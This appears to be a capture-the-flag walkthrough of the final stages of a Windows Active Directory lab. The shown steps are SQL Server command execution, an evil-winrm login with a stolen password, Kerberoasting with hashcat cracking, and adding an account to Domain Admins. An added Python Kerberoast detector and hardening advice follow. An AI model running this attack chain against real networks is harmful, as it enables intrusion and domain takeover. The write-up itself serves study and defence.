Host is up (0.51s latency).
PORT STATE SERVICE
80/tcp open http
135/tcp filtered msrpc
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
5357/tcp filtered wsdapi
5985/tcp filtered wsman
41433/tcp filtered unknown
47001/tcp filtered winrm
49664/tcp filtered unknown
49665/tcp filtered unknown
49666/tcp filtered unknown
└─$ sudo nmap -sS -p 80,135,445,1433,5357,5985,41433,47001,49664,49665,49666 -6 dead:beef::1001 --min-rate 10000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-22 04:17 EDT
Nmap scan report for dead:beef::1001
Host is up (0.38s latency).
PORT STATE SERVICE
80/tcp open http
135/tcp filtered msrpc
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
5357/tcp filtered wsdapi
5985/tcp open wsman
41433/tcp filtered unknown
47001/tcp filtered winrm
49664/tcp filtered unknown
49665/tcp filtered unknown
49666/tcp filtered unknown
You can see that for dead:beef::1001 port 5985 is open, while for dead:beef::250 it is filtered.
We can connect with evil-winrm, but evil-winrm apparently does not accept an IPv6 address directly, so the hostname for dead:beef::1001 needs to be written into /etc/hosts.
SQL> EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("hostname");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
COMPATIBILITY
# write "dead:beef::1001 COMPATIBILITY" into /etc/hosts
└─$ evil-winrm -i compatibility -u administrator -p 'EverybodyWantsToWorkAtP.O.O.'
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
compatibility\administrator
# flag.txt is in \Administrator\Desktop
p00ned
Now we have administrator permission on one host, which is in the domain intranet.poo.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> systeminfo
Host Name: COMPATIBILITY
OS Name: Microsoft Windows Server 2019 Standard
Domain: intranet.poo
Hotfix(s): 4 Hotfix(s) Installed.
[01]: KB4533013
[02]: KB4516115
[03]: KB4523204
[04]: KB4530715
So the first step is to search for hosts and users in the domain. It turns out there are none, because local users cannot send requests to the domain.
However, the SQL Server account can stand in: service accounts automatically impersonate the computer account, and the computer account is a member of the domain; it is actually a special type of user account.
From Intranet penetration | SPN and Kerberoast attack explanation I learned about the Kerberos protocol and SPNs. Further down there is a GetUserSPNs.ps1 script; I uploaded it with evil-winrm, but it seems unstable, and later attempts did not succeed:
*Evil-WinRM* PS C:\programdata> Import-Module .\GetUserSPNs.ps1
Exception calling "FindAllGlobalCatalogs" with "0" argument(s): "An operations error occurred. "
At C:\programdata\GetUserSPNs.ps1:30 char:3
+ $CurrentGCs = $ForestInfo.FindAllGlobalCatalogs()
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : ActiveDirectoryOperationException
No Global Catalogs Found!
Then PowerView.ps1 was apparently stopped by Windows Defender: Powershell Get-Random with dates blocked with "this script contains malicious content". It seems the only options are updating WD or adding the script to the allow list.
Fortunately Invoke-Kerberoast.ps1 also works; this script can export tickets directly in Hashcat format. It failed to execute in evil-winrm, but it can be executed from the shell connected through SQL Server. Probably evil-winrm has insufficient permissions? But the user is already the administrator compatibility\administrator; maybe the domain permissions are insufficient?
SQL> xp_cmdshell "powershell -c import-module c:\programdata\invoke-kerberoast.ps1; invoke-kerberoast -outputformat hashcat"
output
--------------------------------------------------------------------
TicketByteHexStream : # omitted
SamAccountName : p00_hr
DistinguishedName : CN=p00_hr,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : HR_peoplesoft/intranet.poo:1433
TicketByteHexStream : # omitted
SamAccountName : p00_adm
DistinguishedName : CN=p00_adm,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : cyber_audit/intranet.poo:443
We got the tickets of two users, p00_hr and p00_adm. Copying directly from the shell introduces a lot of spaces, so write a script to handle that. Because the Hashcat ticket contains $, put it in single quotes; with double quotes the shell would interpret the string.
#!/bin/bash
# Remove every whitespace character (spaces and line breaks picked up when copying from the SQL shell) from the argument.
# Quoting plus tr avoids word splitting, glob expansion of '*' and printf format handling of '$' and '%' inside the hash.
printf '%s\n' "$(printf '%s' "$1" | tr -d '[:space:]')"
└─$ ./strip_blank.sh 'p00_adm ticket'
$krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo…
└─$ hashcat -m 13100 hash.txt /usr/share/seclists/Passwords/Keyboard-Combinations.txt --force
# The password is ZQ!5t4r
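The ticket request above leaves a clear trace on the domain controller: Security event 4769 (Kerberos service ticket requested) with ticket encryption type 0x17, which is RC4-HMAC, the same etype 23 that appears in the $krb5tgs$23$ hash. The following added example (not from the page or from any SIEM product) runs two detection rules over constructed 4769 events: an RC4 TGS for a user account's SPN, and a burst of tickets for several service accounts from one requester. Field names follow the 4769 event, the sample values and the thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                         # TicketEncryptionType in a Kerberoast request
BURST_DISTINCT_SERVICES = 2             # constructed threshold; tune for your domain
BURST_WINDOW = timedelta(minutes=5)

# Constructed Security event 4769 records (subset of fields). The second and third
# mirror this writeup: the host's machine account asking for p00_hr and p00_adm.
SAMPLE_4769 = [
    {"TimeCreated": "2022-06-22T17:19:40", "TargetUserName": "alice@INTRANET.POO",
     "ServiceName": "COMPATIBILITY$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:172.20.128.50"},
    {"TimeCreated": "2022-06-22T17:20:01", "TargetUserName": "COMPATIBILITY$@INTRANET.POO",
     "ServiceName": "p00_hr", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.11"},
    {"TimeCreated": "2022-06-22T17:20:03", "TargetUserName": "COMPATIBILITY$@INTRANET.POO",
     "ServiceName": "p00_adm", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.11"},
    {"TimeCreated": "2022-06-22T17:25:00", "TargetUserName": "bob@INTRANET.POO",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:172.20.128.51"},
]


def is_user_service_account(service_name: str) -> bool:
    """Computer accounts end in '$' and krbtgt is the TGT service; neither is roastable."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def detect_kerberoast(events):
    """Return (rule, requester, detail) findings for the two rules above."""
    findings = []
    by_requester = defaultdict(list)          # (requester, ip) -> [(time, service)]
    for ev in events:
        svc = ev["ServiceName"]
        if not is_user_service_account(svc):
            continue
        when = datetime.fromisoformat(ev["TimeCreated"])
        key = (ev["TargetUserName"], ev["IpAddress"])
        by_requester[key].append((when, svc))
        if int(ev["TicketEncryptionType"], 16) == RC4_HMAC:
            findings.append(("rc4-tgs-for-user-spn", ev["TargetUserName"], svc))

    for (requester, ip), reqs in by_requester.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            window = {s for t, s in reqs[i:] if t - start <= BURST_WINDOW}
            if len(window) >= BURST_DISTINCT_SERVICES:
                findings.append(("tgs-burst", requester,
                                 f"{len(window)} service accounts within {BURST_WINDOW} from {ip}"))
                break                           # one burst finding per requester is enough
    return findings


if __name__ == "__main__":
    for rule, requester, detail in detect_kerberoast(SAMPLE_4769):
        print(f"{rule}: {requester} -> {detail}")
```

The RC4 rule only works if AES is the norm: set the service accounts' msDS-SupportedEncryptionTypes to AES so an RC4 request stands out, and note that the password cracked here came from a short keyboard pattern in a wordlist, which is the other half of the fix (long random passwords or group managed service accounts for anything that holds an SPN).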
Then add p00_adm to the Domain Admins group:
*Evil-WinRM* PS C:\programdata> $pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> $cred = New-Object System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass)
*Evil-WinRM* PS C:\programdata> Add-ADGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $cred
└─$ evil-winrm -i compatibility -u p00_adm -p 'ZQ!5t4r'
*Evil-WinRM* PS C:\Users\p00_adm\Documents> net use \\DC.intranet.poo\c$ /u:intranet.poo\p00_adm 'ZQ!5t4r'
The command completed successfully.
*Evil-WinRM* PS C:\Users\p00_adm\Documents> dir \\DC.intranet.poo\c$\users\
Directory: \\DC.intranet.poo\c$\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/15/2018 1:20 AM Administrator
d----- 3/15/2018 12:38 AM mr3ks
d----- 6/22/2022 5:21 PM p00_adm
d-r--- 11/21/2016 3:24 AM Public
*Evil-WinRM* PS C:\Users\p00_adm\Documents> type \\DC.intranet.poo\c$\users\mr3ks\desktop\flag.txt
POO{
1196ef8bc523f084ad1732a38a0851d6}
Summary
Here P.O.O is finally done. With a lot of help from the walkthrough I also learned many things I didn't know before.
The Recon part is directory enumeration, exploiting the IIS short name vulnerability.
The Huh?! part is SQL Server privilege escalation, exploiting the escalation caused by a Linked Database misconfiguration.
The BackTrack part reads the sensitive file C:\inetpub\wwwroot\web.config from the IIS server: SQL Server's external script engine runs code as another user, which gives the permission to read web.config.
The Foothold part shows that some services are not listening only on the IPv4 address but may be on IPv6; beyond the difference between the TCP and UDP transport protocols, sometimes you need to check the services on IPv6.
The p00ned part is domain privilege escalation: obtain a password by getting Kerberos tickets, then elevate the user to domain administrator to access the domain controller.